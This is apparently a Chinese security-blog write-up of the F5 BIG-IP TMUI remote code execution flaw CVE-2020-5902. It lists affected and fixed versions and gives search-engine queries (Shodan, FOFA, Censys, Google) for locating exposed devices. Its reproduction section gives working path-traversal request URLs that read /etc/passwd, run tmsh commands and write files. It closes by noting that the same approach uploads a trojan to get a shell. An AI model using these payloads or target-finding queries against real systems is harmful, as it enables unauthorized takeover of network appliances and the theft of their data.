一、漏洞详情
近日,绿盟科技监测到F5官方对流量管理用户界面(TMUI)远程代码执行漏洞(CVE-2020-5902)的安全公告进行了更新。受影响的15.x版本变更为15.0.0-15.1.0,更新了可被绕过的临时缓解措施及验证方法;未经身份验证的攻击者通过BIG-IP管理端口或自身IP访问TMUI,可构造恶意请求获取目标服务器权限,CVSS评分为10分。目前msf已经集成了该漏洞的利用,建议还未修复的用户尽快采取措施进行防护。
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。
二、 影响范围
受影响版本
F5 BIG-IP 15.x:15.0.0 - 15.1.0
F5 BIG-IP 14.x:14.1.0 - 14.1.2
F5 BIG-IP 13.x:13.1.0 - 13.1.3
F5 BIG-IP 12.x:12.1.0 - 12.1.5
F5 BIG-IP 11.x:11.6.1 - 11.6.5
不受影响版本
F5 BIG-IP 15.x:15.1.0.4
F5 BIG-IP 14.x:14.1.2.6
F5 BIG-IP 13.x:13.1.3.4
F5 BIG-IP 12.x:12.1.5.2
F5 BIG-IP 11.x:11.6.5.2
三、 环境搭建、网络空间探测
到官网这个页面选择你想要下载的版本:
https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v15.x
以下是F5 BIG-IP设备在各大检索平台的检索规则
shodan
http.favicon.hash:-335242539
http.title:“BIG-IP® ;- Redirect”
fofa
title=“BIG-IP® ;- Redirect”
censys
443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5
443.https.get.title:“BIG-IP® ;- Redirect”
google
inurl:“tmui/login.jsp”
intitle:“BIG-IP” inurl:“tmui”
四、漏洞复现
读取文件 Read File
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
执行命令 RCE
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
写入文件 Upload File & 查看文件内容 File Read
/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/22&content=hello tiger!
读取/tmp/22文件是否写入
按照这个思路即可上传木马,getshell。